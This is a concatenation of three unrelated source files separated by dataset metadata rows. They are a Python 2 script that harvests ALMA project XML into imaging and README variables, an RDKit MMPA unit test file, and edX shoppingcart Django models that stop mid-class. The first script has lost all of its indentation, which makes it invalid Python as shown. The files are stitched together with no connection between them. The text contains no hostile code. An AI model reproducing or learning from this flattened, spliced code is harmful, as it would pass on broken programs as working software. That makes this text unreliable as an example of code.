# ----------------------------------------
#Scraping the XML files for the required information for the imaging script & README
XML_dict['projectName'] = project_root.find("prj:projectName", xmlns).text
XML_dict['pI'] = project_root.find("prj:pI", xmlns).text
XML_dict['project_version'] = project_root.find("prj:version", xmlns).text
XML_dict['projectCode'] = project_root.find("prj:code", xmlns).text
#XML_dict['pointing_accruacy'] = schedblock_root.find("./prj:ObsUnitControl/prj:CalibrationRequirements/prj:pointingAccuracy", xmlns).text
XML_dict['angular_resolution'] = project_root.find("./prj:ObsProgram/prj:ScienceGoal/prj:PerformanceParameters/prj:desiredAngularResolution", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Cycle number (determined by year of observation)
XML_dict['cycle'] = proposal_root.find("prp:cycle", xmlns).text #ex: 2015.1
if '2015' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 3"
if '2014' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2013' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2012' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 1"
# ----------------------------------------
# ----------------------------------------
#I need to determine what the science target is (can't always be done through /sbl:name or /sbl:sourceName).
#What I do is find the /sbl:name that has "Primary" and record the index number of which child node it is
#I record index number with the i-iterator.
#I use that index number to search the /sbl:FieldSource and determine the unique entityPartId number.
#Since that number is unique I've secured a way to locate all relevant information about the science target.
i=1
for child in schedblock_root.findall("./sbl:FieldSource/sbl:name",xmlns):
if "Primary" in child.text:
primary_index = i
i=i+1
#I need to create a string that codes in the index value since XPath doesn't take variables. This will have to be done for each item that is located using the entityPartId since it's located in a variable.
entityPartId_string = "./sbl:FieldSource[%i]" % primary_index
XML_dict['entityPartId'] = schedblock_root.find(entityPartId_string, xmlns).attrib.get('entityPartId')
#Now I can use XPath and the unique entityPartId to garuntee correct results
# ----------------------------------------
# ----------------------------------------
#Source name
source_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceName" % XML_dict['entityPartId']
XML_dict['source_name'] = schedblock_root.find(source_string, xmlns).text
# ----------------------------------------
# ----------------------------------------
#Reference system
reference_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceVelocity" % XML_dict['entityPartId']
XML_dict['outframe'] = schedblock_root.find(reference_string, xmlns).attrib.get('referenceSystem')
# ----------------------------------------
# ----------------------------------------
#Requested rms
for child in schedblock_root.findall("./sbl:ScienceParameters/sbl:sensitivityGoal", xmlns):
rms_value = child.text #sensitivity may not be rms
rms_unit = child.attrib.get('unit')
XML_dict['sensitivity'] = rms_value + rms_unit
# ----------------------------------------
# ----------------------------------------
#Determining if the bandwidth used for sensitivity is in frequency or velocity space
repBandwidth = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).text
repBandwidthUnit = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).attrib
if 'Hz' in repBandwidthUnit['unit']:
XML_dict['clean_mode'] = 'frequency'
else:
XML_dict['clean_mode'] = 'velocity'
# ----------------------------------------
# ----------------------------------------
#We know it's continuum here (from user input) so should be 7.5GHz:
XML_dict['width'] = repBandwidth + repBandwidthUnit.get('unit') #this is to put it in proper form for the imaging script
# ----------------------------------------
# ----------------------------------------
#Imagermode: csclean or mosaic mode?
imagermode_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:PointingPattern/sbl:isMosaic" % XML_dict['entityPartId']
imagermode_boolean = schedblock_root.find(imagermode_string, xmlns).text
if imagermode_boolean == 'false':
XML_dict['imagermode'] = 'csclean'
else:
XML_dict['imagermode'] = 'mosaic'
# ----------------------------------------
# ----------------------------------------
#SPW information from SchedBlock files
#I have to use the indexing because I can't specify the sbl:name attribute until I know what it is - so I look for "Science" then get the index,
index=1 # Note that a node's position in a context is not zero-based. The first node has a position of 1.
for SpectralSpec in schedblock_root.findall("./sbl:SpectralSpec/sbl:name", xmlns):
if 'Science' in SpectralSpec.text:
sbl_name = SpectralSpec.text
science_setup_index = index
index = index + 1
#...then real name, then that SpectralSpec (using the index) for right spw info
spw_channel_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:effectiveNumberOfChannels" % science_setup_index
spw_channel_list = schedblock_root.findall(spw_channel_list_string, xmlns)
spw_channels = []
for spw in spw_channel_list:
spw_channels.append(spw.text) #continuum will be low # of channels, lines will have high # of channels
XML_dict['spw_channels'] = spw_channels
#...then getting the averaging used on each SPW
spw_avg_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:spectralAveragingFactor" % science_setup_index
spw_avg_list = schedblock_root.findall(spw_avg_list_string, xmlns)
spw_averaging= []
for spw in spw_avg_list:
spw_averaging.append(spw.text)
XML_dict['spw_averaging'] = spw_averaging
#...then determining the final number of channels after averaging
width_after_averaging = []
for i in range(0,len(spw_channels)):
post_average = int(spw_channels[i]) / int(spw_averaging[i])
width_after_averaging.append(post_average)
XML_dict['width_after_averaging'] = width_after_averaging
# ----------------------------------------
print'Harvesting XML files complete'
return XML_dict
#--------------------------------------------------
def WriteLineInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project):
#--------------------------------------------------
import os
import IPython
print'Generating variables file...'
#Writing a new file containing all the "scraped" XML information
#if it's manual, it has a different path structure
if manual_project == 'yes':
os.chdir('%s%s_%s/' % (project_path, XML_dict['project_number'], datadict['mous']))
#this is because something silly between pipetemp and the NAASC-run pipeline produce different slightly different filenames
elif jaws_project == 'yes':
os.chdir('%s/tbuff0_%s.MOUS_%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
else:
os.chdir('%s%s.MOUS.%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
variable_file = open('xml_variables.txt.', 'w')
variable_file.truncate
#Imaging Info
variable_file.write('\tImaging Script variables: Double-check these values in the OT\n')
variable_file.write('Number of spws (length of array) and their width (values in array element): %s \n' % XML_dict['spw_channels'])
#variable_file.write('Field (for clean) = \n')
variable_file.write('imagermode = %s\n' % XML_dict['imagermode'])
#variable_file.write('Cell size = \n') #cell size (206265/longest wavelength (uvdist or uvwave dist))
#variable_file.write('Image size = \n') #calculate once cell size is known
variable_file.write('outframe = %s\n' % XML_dict['outframe'])
variable_file.write('veltype = radio\n')
#variable_file.write('fitspw = \n')
variable_file.write('sourcename = %s\n' % XML_dict['source_name'])
variable_file.write('linename = %s\n' % XML_dict['transition_name'])
#variable_file.write('Line-cube start velocity = %s <-- changed on purpose for adequate cube space\n' % XML_dict['cube_start'])
variable_file.write('Line-cube width = %skm/s\n' % XML_dict['repBandwidthKMs'])
#variable_file.write('Line-cube nchan = %i\n' % XML_dict['nchan'])
if float(XML_dict['restFrequency']) > 500: #If the object has a z > 0.2 we use the sky frequency instead of rest frequency (I just guessed on the 500); I don't think the OT gets this from the XML's, I think it accesses some sort of database.
variable_file.write('restfreq = %s\n' % XML_dict['skyFrequency'])
else:
variable_file.write('restfreq = %s\n' % XML_dict['restFrequency'])
#Writing variables for README Info
variable_file.write('\n\n\n\n README info\n')
variable_file.write('Cycle: %s\n' % XML_dict['cycle'])
variable_file.write('Project Code: %s\n' % XML_dict['projectCode'])
variable_file.write('SB Name: %s\n' % SB_name)
variable_file.write('PI Name: %s\n' % XML_dict['pI'])
variable_file.write('Project Title: %s\n' % XML_dict['projectName'])
variable_file.write('Configuration: \n') #go into the "text.txt" file if manual, or html page if pipeline
variable_file.write('Proposed rms: %s / %skm/s width\n' % (XML_dict['sensitivity'] ,XML_dict['repBandwidthKMs']))
variable_file.write('Proposed beamsize: %s (double-check this)\n' % XML_dict['angular_resolution']) # beamsize: right now I have no way to determine between the different science goals in the ObsProject
variable_file.write('CASA (pipeline) version used for reduction: \n')
variable_file.write('QA2 Result: PASS/SEMIPASS\n')
variable_file.write('Total Number of Member SBs in this OUS Group: \n\n')
variable_file.write('Comments from reducer:\n\tCalibration Comments: \n\t\tmanual/pipeline? \n\t\tAntennas flagged? \n\t\tOther changes to calibration script? \n\n\tImaging comments: \n\t\tself cal? \n\t\tweighting? \n\t\tuvtaper? \n\t\tContinuum Subtraction? \n\n\tContinuum Clean iterations: \n\tContinuum beamsize: \n\tContinuum rms: \n\n\tLine-cube Clean iterations: \n\tLine-Cube beamsize: \n\tLine-cube rms: / ??km/s')
variable_file.write('\n\nThe PI may wish to modify the channels which were identified as "line-free" based on a dirty image or inspection of the calibrated visibilities.')
variable_file.write('\n\nIf the project is a SEMIPASS please add: This project was declared QA2 SEMIPASS, meaning that it did not meet the PI requested performance parameters (in this case because the Beam size sensitivity is a factor of 1.6 too high) but is being delivered anyway. The reason for the early delivery is: due to changes in array availability at the end of the Cycle, this OUS could not be re-observed with the requested configuration, and therefore, the science goals were not fully met.')
variable_file.close()
print'Generating variables file complete'
#--------------------------------------------------
def WriteContinuumInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project):
#--------------------------------------------------
import os
import IPython
print'Generating variables file...'
#Writing a new file containing all the "scraped" XML information
#if it's manual, it has a different path structure
if manual_project == 'yes':
os.chdir('%s%s_%s/' % (project_path, XML_dict['project_number'], datadict['mous']))
#this is because something silly between pipetemp and the NAASC-run pipeline produce different slightly different filenames
elif jaws_project == 'yes':
os.chdir('%s/tbuff0_%s.MOUS_%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
else:
os.chdir('%s%s.MOUS.%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
variable_file = open('xml_variables.txt.', 'w')
variable_file.truncate
#Imaging Info
variable_file.write('\tImaging Script variables: Double-check these values in the OT\n')
variable_file.write('Number of spws (length of array) and their width (values in array element): %s \n' % XML_dict['spw_channels'])
#variable_file.write('Field (for clean) = \n')
variable_file.write('imagermode = %s\n' % XML_dict['imagermode'])
#variable_file.write('Cell size = \n') #cell size (206265/longest wavelength (uvdist or uvwave dist))
#variable_file.write('Image size = \n') #calculate once cell size is known
variable_file.write('outframe = %s\n' % XML_dict['outframe'])
variable_file.write('veltype = radio\n')
#variable_file.write('fitspw = \n')
#Writing variables for README Info
variable_file.write('\n\n\n\n README info\n')
variable_file.write('Cycle: %s\n' % XML_dict['cycle'])
variable_file.write('Project Code: %s\n' % XML_dict['projectCode'])
variable_file.write('SB Name: %s\n' % SB_name)
variable_file.write('PI Name: %s\n' % XML_dict['pI'])
variable_file.write('Project Title: %s\n' % XML_dict['projectName'])
variable_file.write('Configuration: \n') #go into the "text.txt" file if manual, or html page if pipeline
variable_file.write('Proposed rms: %s / %skm/s width\n' % (XML_dict['sensitivity'] ,XML_dict['width']))
variable_file.write('Proposed beamsize: %s (double-check this)\n' % XML_dict['angular_resolution']) # beamsize: right now I have no way to determine between the different science goals in the ObsProject
variable_file.write('CASA (pipeline) version used for reduction: \n')
variable_file.write('QA2 Result: PASS/SEMIPASS\n')
variable_file.write('Total Number of Member SBs in this OUS Group: \n\n')
variable_file.write('Comments from reducer:\n\tCalibration Comments: \n\t\tmanual/pipeline? \n\t\tAntennas flagged? \n\t\tOther changes to calibration script? \n\n\tImaging comments: \n\t\tself cal? \n\t\tweighting? \n\t\tuvtaper? \n\n\tContinuum Clean iterations: \n\tContinuum beamsize: \n\tContinuum rms: ')
variable_file.write('\n\nThe PI may wish to modify the channels which were identified as "line-free" based on a dirty image or inspection of the calibrated visibilities.')
variable_file.write('\n\nIf the project is a SEMIPASS please add: This project was declared QA2 SEMIPASS, meaning that it did not meet the PI requested performance parameters (in this case because the Beam size sensitivity is a factor of 1.6 too high) but is being delivered anyway. The reason for the early delivery is: due to changes in array availability at the end of the Cycle, this OUS could not be re-observed with the requested configuration, and therefore, the science goals were not fully met.')
variable_file.close()
print'Generating variables file complete'
#--------------------------------------------------
def main():
#--------------------------------------------------
import IPython
dataurl="http://www.eso.org/~fstoehr/project_ous_eb_hierarchy.txt"
dataurl2="http://www.eso.org/~fstoehr/ous_eb_qa0status.txt"
raw_input('\nThis requires you download the .aot file from the SCOPS ticket to your local computer. Press ENTER when ready.\n')
user_name = raw_input('> Enter your username: ').strip()
if user_name == 'bkirk':
path_aot = '/users/bkirk/Documents/DataProcessing/AOTpackages'
else:
path_aot = raw_input('> Enter the path to the .aot file (excluding .aot name): ').strip()
name_aot = raw_input('> Enter the name of the .aot file: ').strip()
mous_code = raw_input('> Enter the MOUS of your project: ').strip()
jaws_project = raw_input('> Is this a JAWS project (yes/no)?: ').strip()
manual_project = raw_input('> Is this a manual project (yes/no)?: ').strip()
type_project = raw_input('> Is this a line or continuum project?: ').strip()
mous_code = mous_code.replace("://","___").replace("/","_")
datadict = ReadDataFromWeb(dataurl,dataurl2, mous_code)
project_path = '/lustre/naasc/sciops/qa2/%s/' % user_name
SB_name = datadict['sbnames']
SB_name = SB_name[0].strip('\"')
if type_project == 'continuum':
project_root, proposal_root, xmlns = SetXMLFiles(datadict, user_name, path_aot, name_aot)
XML_dict = HarvestXMLContinuum(project_root, proposal_root, xmlns, SB_name, path_aot, name_aot)
WriteContinuumInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project)
else:
project_root, proposal_root, xmlns = SetXMLFiles(datadict, user_name, path_aot, name_aot)
XML_dict = HarvestXMLLine(project_root, proposal_root, xmlns, SB_name, path_aot, name_aot)
WriteLineInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project)
print'\nSuccesful XML harvest\n'
if user_name == 'bkirk':
IPython.embed()
#--------------------------------------------------
main()
#--------------------------------------------------
'''
Continuum project failed; tried looking for repBandwidthKMs
Some cubes work, some fail?
-why 100km/s in OT when XML computes 84km/s?
-user input?
-Refine the skyfreq decision (wasn't reported for the high Z project 00853)
-figure out python to read email and kick off imaging/manual staging script
-Number of SPWs and their properties
-already have spw numbers
-already have spw averaging
-calculate smoothing needed
-need to know which Band is observed
-determine MHz/channel (in OT)
-calculate the channels needed to smooth
-IMAGING & MANUAL XML
-parallelize multiple ASDM projects
-downloading of ASDMs (imaging & manual)
-running generateReducScript (manual)
-way to check weights proportion? (first part of scriptforImaging)
-code up QA2 report checks
-run strip instructions - then remove stripinstructions.py
-check for extra casapy and ipython logs
'''
|
bmarshallk/NAASC
|
various_scripts/HarvestAOTXML.py
|
Python
|
gpl-3.0
| 35,241
|
[
"Brian"
] |
20169d9e1c3099f88fe5dcfebaa5336dc1f7fb7595b20a3ef6d4668c0fb51dad
|
from rdkit import RDConfig
import unittest
from rdkit import Chem
from rdkit.Chem import rdMMPA
def natoms(tpl):
return tuple(x.GetNumAtoms() if x is not None else 0 for x in tpl)
class TestCase(unittest.TestCase):
def setUp(self):
pass
def test1(self):
m = Chem.MolFromSmiles('c1ccccc1OC')
frags = rdMMPA.FragmentMol(m)
self.assertEqual(len(frags), 3)
for frag in frags:
self.assertEqual(len(frag), 2)
frags = sorted(frags, key=natoms)
self.assertEqual(frags[0][0], None)
self.assertEqual(frags[1][0], None)
self.assertNotEqual(frags[2][0], None)
self.assertNotEqual(frags[0][1], None)
self.assertNotEqual(frags[1][1], None)
self.assertNotEqual(frags[2][1], None)
self.assertEqual(frags[0][1].GetNumAtoms(), m.GetNumAtoms() + 2)
self.assertEqual(frags[1][1].GetNumAtoms(), m.GetNumAtoms() + 2)
fs = Chem.GetMolFrags(frags[0][1], asMols=True)
self.assertEqual(len(fs), 2)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'c1ccc([*:1])cc1')
self.assertEqual(Chem.MolToSmiles(fs[1], True), 'CO[*:1]')
fs = Chem.GetMolFrags(frags[1][1], asMols=True)
self.assertEqual(len(fs), 2)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'c1ccc(O[*:1])cc1')
self.assertEqual(Chem.MolToSmiles(fs[1], True), 'C[*:1]')
fs = Chem.GetMolFrags(frags[2][0], asMols=True)
self.assertEqual(len(fs), 1)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'O([*:1])[*:2]')
fs = Chem.GetMolFrags(frags[2][1], asMols=True)
self.assertEqual(len(fs), 2)
self.assertEqual(Chem.MolToSmiles(fs[0], True), 'c1ccc([*:2])cc1')
self.assertEqual(Chem.MolToSmiles(fs[1], True), 'C[*:1]')
def test2(self):
m = Chem.MolFromSmiles('c1ccccc1OC')
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
self.assertEqual(len(frags), 3)
for frag in frags:
self.assertEqual(len(frag), 2)
frags = sorted(frags)
self.assertEqual(frags[0][0], '')
self.assertEqual(frags[1][0], '')
self.assertNotEqual(frags[2][0], '')
self.assertNotEqual(frags[0][1], '')
self.assertNotEqual(frags[1][1], '')
self.assertNotEqual(frags[2][1], '')
self.assertEqual(frags[0][1], 'CO[*:1].c1ccc([*:1])cc1')
self.assertEqual(frags[1][1], 'C[*:1].c1ccc(O[*:1])cc1')
self.assertEqual(frags[2][0], 'O([*:1])[*:2]')
self.assertEqual(frags[2][1], 'C[*:1].c1ccc([*:2])cc1')
def test3(self):
m = Chem.MolFromSmiles('c1ccccc1OC')
frags = rdMMPA.FragmentMol(m, resultsAsMols=False, pattern='cO')
self.assertEqual(len(frags), 1)
for frag in frags:
self.assertEqual(len(frag), 2)
frags = sorted(frags)
self.assertEqual(frags[0][0], '')
self.assertNotEqual(frags[0][1], '')
self.assertEqual(frags[0][1], 'CO[*:1].c1ccc([*:1])cc1')
def test4(self):
m = Chem.MolFromSmiles('Cc1ccccc1NC(=O)C(C)[NH+]1CCCC1') # ZINC00000051
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
#for frag in sorted(frags):
# print(frag)
cores = set(x[0] for x in frags)
self.assertTrue('C([*:1])([*:2])[*:3]' in cores)
# FIX: this needs to be investigated, it's not currently passing
#self.assertTrue('O=C(N[*:3])C([*:1])[*:2]' in cores)
self.assertEqual(len(frags), 18)
for frag in frags:
self.assertEqual(len(frag), 2)
def test5(self):
m = Chem.MolFromSmiles(
"CC[C@H](C)[C@@H](C(=O)N[C@H]1CSSC[C@H]2C(=O)NCC(=O)N3CCC[C@H]3C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@@H](CSSC[C@@H](C(=O)N[C@H](C(=O)N4CCC[C@H]4C(=O)N[C@H](C(=O)N2)C)CC(=O)N)NC1=O)C(=O)N)CO)Cc5ccc(cc5)O)CCCC[NH3+])N") # ALPHA-CONOTOXIN SI
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
self.assertFalse(len(frags))
frags = rdMMPA.FragmentMol(m, maxCuts=2, maxCutBonds=21, resultsAsMols=False)
self.assertEqual(len(frags), 231)
def test6(self):
m = Chem.MolFromSmiles(
"CC[C@H](C)[C@@H](C(=O)N[C@H]1CSSC[C@H]2C(=O)NCC(=O)N3CCC[C@H]3C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@H](C(=O)N[C@@H](CSSC[C@@H](C(=O)N[C@H](C(=O)N4CCC[C@H]4C(=O)N[C@H](C(=O)N2)C)CC(=O)N)NC1=O)C(=O)N)CO)Cc5ccc(cc5)O)CCCC[NH3+])N") # ALPHA-CONOTOXIN SI
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
self.assertFalse(len(frags))
frags1 = rdMMPA.FragmentMol(m, minCuts=1, maxCuts=1, maxCutBonds=21,
resultsAsMols=False)
frags2 = rdMMPA.FragmentMol(m, minCuts=2, maxCuts=2, maxCutBonds=21,
resultsAsMols=False)
frags = rdMMPA.FragmentMol(m, maxCuts=2, maxCutBonds=21, resultsAsMols=False)
self.assertEqual(set(frags1+frags2), set(frags))
self.assertEqual(set(frags1).intersection(set(frags2)), set())
def test7(self):
m = Chem.MolFromSmiles("Oc1ccccc1N")
frags1 = rdMMPA.FragmentMol(m, minCuts=1, maxCuts=1, maxCutBonds=21,
resultsAsMols=False)
frags2 = rdMMPA.FragmentMol(m, minCuts=2, maxCuts=2, maxCutBonds=21,
resultsAsMols=False)
frags = rdMMPA.FragmentMol(m, maxCuts=2, maxCutBonds=21, resultsAsMols=False)
self.assertEqual(set(frags1+frags2), set(frags))
def test8(self):
m = Chem.MolFromSmiles('Cc1ccccc1NC(=O)C(C)[NH+]1CCCC1') # ZINC00000051
sm = Chem.MolFromSmarts("[#6+0;!$(*=,#[!#6])]!@!=!#[*]")
matching_atoms = m.GetSubstructMatches(sm)
bonds = []
for a,b in matching_atoms:
bond = m.GetBondBetweenAtoms(a,b)
bonds.append(bond.GetIdx())
frags = rdMMPA.FragmentMol(m, resultsAsMols=False)
frags2 = rdMMPA.FragmentMol(m, bonds, resultsAsMols=False)
frags3 = rdMMPA.FragmentMol(m, tuple(bonds), resultsAsMols=False)
self.assertEqual(frags, frags2)
self.assertEqual(frags2, frags3)
def test9(self):
m = Chem.MolFromSmiles("Oc1ccccc1N")
try:
frags1 = rdMMPA.FragmentMol(m, minCuts=1, maxCuts=0, maxCutBonds=21,
resultsAsMols=False)
self.assertTrue(False) # should not get here
except ValueError as e:
self.assertEqual(str(e), "supplied maxCuts is less than minCuts")
try:
frags1 = rdMMPA.FragmentMol(m, minCuts=0, maxCuts=0, maxCutBonds=21,
resultsAsMols=False)
self.assertTrue(False) # should not get here
except ValueError as e:
self.assertEqual(str(e), "minCuts must be greater than 0")
if __name__ == "__main__":
unittest.main()
|
bp-kelley/rdkit
|
Code/GraphMol/MMPA/Wrap/testMMPA.py
|
Python
|
bsd-3-clause
| 6,407
|
[
"RDKit"
] |
975b937d5f460ccc76b6f664d7b47adf58196d0eaff6cfeab15f57c636d2ce00
|
from datetime import datetime
import pytz
import logging
import smtplib
from model_utils.managers import InheritanceManager
from collections import namedtuple
from boto.exception import BotoServerError # this is a super-class of SESError and catches connection errors
from django.dispatch import receiver
from django.db import models
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.utils.translation import ugettext as _
from django.db import transaction
from django.core.urlresolvers import reverse
from xmodule.modulestore.django import modulestore
from xmodule.course_module import CourseDescriptor
from xmodule.modulestore.exceptions import ItemNotFoundError
from course_modes.models import CourseMode
from mitxmako.shortcuts import render_to_string
from student.views import course_from_id
from student.models import CourseEnrollment, unenroll_done
from verify_student.models import SoftwareSecurePhotoVerification
from .exceptions import (InvalidCartItem, PurchasedCallbackException, ItemAlreadyInCartException,
AlreadyEnrolledInCourseException, CourseDoesNotExistException)
log = logging.getLogger("shoppingcart")
ORDER_STATUSES = (
('cart', 'cart'),
('purchased', 'purchased'),
('refunded', 'refunded'),
)
# we need a tuple to represent the primary key of various OrderItem subclasses
OrderItemSubclassPK = namedtuple('OrderItemSubclassPK', ['cls', 'pk']) # pylint: disable=C0103
class Order(models.Model):
"""
This is the model for an order. Before purchase, an Order and its related OrderItems are used
as the shopping cart.
FOR ANY USER, THERE SHOULD ONLY EVER BE ZERO OR ONE ORDER WITH STATUS='cart'.
"""
user = models.ForeignKey(User, db_index=True)
currency = models.CharField(default="usd", max_length=8) # lower case ISO currency codes
status = models.CharField(max_length=32, default='cart', choices=ORDER_STATUSES)
purchase_time = models.DateTimeField(null=True, blank=True)
# Now we store data needed to generate a reasonable receipt
# These fields only make sense after the purchase
bill_to_first = models.CharField(max_length=64, blank=True)
bill_to_last = models.CharField(max_length=64, blank=True)
bill_to_street1 = models.CharField(max_length=128, blank=True)
bill_to_street2 = models.CharField(max_length=128, blank=True)
bill_to_city = models.CharField(max_length=64, blank=True)
bill_to_state = models.CharField(max_length=8, blank=True)
bill_to_postalcode = models.CharField(max_length=16, blank=True)
bill_to_country = models.CharField(max_length=64, blank=True)
bill_to_ccnum = models.CharField(max_length=8, blank=True) # last 4 digits
bill_to_cardtype = models.CharField(max_length=32, blank=True)
# a JSON dump of the CC processor response, for completeness
processor_reply_dump = models.TextField(blank=True)
@classmethod
def get_cart_for_user(cls, user):
"""
Always use this to preserve the property that at most 1 order per user has status = 'cart'
"""
# find the newest element in the db
try:
cart_order = cls.objects.filter(user=user, status='cart').order_by('-id')[:1].get()
except ObjectDoesNotExist:
# if nothing exists in the database, create a new cart
cart_order, _created = cls.objects.get_or_create(user=user, status='cart')
return cart_order
@classmethod
def user_cart_has_items(cls, user):
"""
Returns true if the user (anonymous user ok) has
a cart with items in it. (Which means it should be displayed.
"""
if not user.is_authenticated():
return False
cart = cls.get_cart_for_user(user)
return cart.has_items()
@property
def total_cost(self):
"""
Return the total cost of the cart. If the order has been purchased, returns total of
all purchased and not refunded items.
"""
return sum(i.line_cost for i in self.orderitem_set.filter(status=self.status)) # pylint: disable=E1101
def has_items(self):
"""
Does the cart have any items in it?
"""
return self.orderitem_set.exists() # pylint: disable=E1101
def clear(self):
"""
Clear out all the items in the cart
"""
self.orderitem_set.all().delete()
def purchase(self, first='', last='', street1='', street2='', city='', state='', postalcode='',
country='', ccnum='', cardtype='', processor_reply_dump=''):
"""
Call to mark this order as purchased. Iterates through its OrderItems and calls
their purchased_callback
`first` - first name of person billed (e.g. John)
`last` - last name of person billed (e.g. Smith)
`street1` - first line of a street address of the billing address (e.g. 11 Cambridge Center)
`street2` - second line of a street address of the billing address (e.g. Suite 101)
`city` - city of the billing address (e.g. Cambridge)
`state` - code of the state, province, or territory of the billing address (e.g. MA)
`postalcode` - postal code of the billing address (e.g. 02142)
`country` - country code of the billing address (e.g. US)
`ccnum` - last 4 digits of the credit card number of the credit card billed (e.g. 1111)
`cardtype` - 3-digit code representing the card type used (e.g. 001)
`processor_reply_dump` - all the parameters returned by the processor
"""
if self.status == 'purchased':
return
self.status = 'purchased'
self.purchase_time = datetime.now(pytz.utc)
self.bill_to_first = first
self.bill_to_last = last
self.bill_to_city = city
self.bill_to_state = state
self.bill_to_country = country
self.bill_to_postalcode = postalcode
if settings.MITX_FEATURES['STORE_BILLING_INFO']:
self.bill_to_street1 = street1
self.bill_to_street2 = street2
self.bill_to_ccnum = ccnum
self.bill_to_cardtype = cardtype
self.processor_reply_dump = processor_reply_dump
# save these changes on the order, then we can tell when we are in an
# inconsistent state
self.save()
# this should return all of the objects with the correct types of the
# subclasses
orderitems = OrderItem.objects.filter(order=self).select_subclasses()
for item in orderitems:
item.purchase_item()
# send confirmation e-mail
subject = _("Order Payment Confirmation")
message = render_to_string('emails/order_confirmation_email.txt', {
'order': self,
'order_items': orderitems,
'has_billing_info': settings.MITX_FEATURES['STORE_BILLING_INFO']
})
try:
send_mail(subject, message,
settings.DEFAULT_FROM_EMAIL, [self.user.email]) # pylint: disable=E1101
except (smtplib.SMTPException, BotoServerError): # sadly need to handle diff. mail backends individually
log.error('Failed sending confirmation e-mail for order %d', self.id) # pylint: disable=E1101
def generate_receipt_instructions(self):
"""
Call to generate specific instructions for each item in the order. This gets displayed on the receipt
page, typically. Instructions are something like "visit your dashboard to see your new courses".
This will return two things in a pair. The first will be a dict with keys=OrderItemSubclassPK corresponding
to an OrderItem and values=a set of html instructions they generate. The second will be a set of de-duped
html instructions
"""
instruction_set = set([]) # heh. not ia32 or alpha or sparc
instruction_dict = {}
order_items = OrderItem.objects.filter(order=self).select_subclasses()
for item in order_items:
item_pk_with_subclass, set_of_html = item.generate_receipt_instructions()
instruction_dict[item_pk_with_subclass] = set_of_html
instruction_set.update(set_of_html)
return instruction_dict, instruction_set
class OrderItem(models.Model):
"""
This is the basic interface for order items.
Order items are line items that fill up the shopping carts and orders.
Each implementation of OrderItem should provide its own purchased_callback as
a method.
"""
objects = InheritanceManager()
order = models.ForeignKey(Order, db_index=True)
# this is denormalized, but convenient for SQL queries for reports, etc. user should always be = order.user
user = models.ForeignKey(User, db_index=True)
# this is denormalized, but convenient for SQL queries for reports, etc. status should always be = order.status
status = models.CharField(max_length=32, default='cart', choices=ORDER_STATUSES)
qty = models.IntegerField(default=1)
unit_cost = models.DecimalField(default=0.0, decimal_places=2, max_digits=30)
line_desc = models.CharField(default="Misc. Item", max_length=1024)
currency = models.CharField(default="usd", max_length=8) # lower case ISO currency codes
fulfilled_time = models.DateTimeField(null=True)
@property
def line_cost(self):
""" Return the total cost of this OrderItem """
return self.qty * self.unit_cost
@classmethod
def add_to_order(cls, order, *args, **kwargs):
"""
A suggested convenience function for subclasses.
NOTE: This does not add anything to the cart. That is left up to the
subclasses to implement for themselves
"""
# this is a validation step to verify that the currency of the item we
# are adding is the same as the currency of the order we are adding it
# to
currency = kwargs.get('currency', 'usd')
if order.currency != currency and order.orderitem_set.exists():
raise InvalidCartItem(_("Trying to add a different currency into the cart"))
@transaction.commit_on_success
def purchase_item(self):
"""
This is basically a wrapper around purchased_callback that handles
modifying the OrderItem itself
"""
self.purchased_callback()
self.status = 'purchased'
self.fulfilled_time = datetime.now(pytz.utc)
self.save()
def purchased_callback(self):
"""
This is called on each inventory item in the shopping cart when the
purchase goes through.
"""
raise NotImplementedError
def generate_receipt_instructions(self):
"""
This is called on each item in a purchased order to generate receipt instructions.
This should return a list of `ReceiptInstruction`s in HTML string
Default implementation is to return an empty set
"""
return self.pk_with_subclass, set([])
@property
def pk_with_subclass(self):
"""
Returns a named tuple that annotates the pk of this instance with its class, to fully represent
a pk of a subclass (inclusive) of OrderItem
"""
return OrderItemSubclassPK(type(self), self.pk)
@property
def single_item_receipt_template(self):
"""
The template that should be used when there's only one item in the order
"""
return 'shoppingcart/receipt.html'
@property
def single_item_receipt_context(self):
"""
Extra variables needed to render the template specified in
`single_item_receipt_template`
"""
return {}
@property
def additional_instruction_text(self):
"""
Individual instructions for this order item.
Currently, only used for e-mails.
"""
return ''
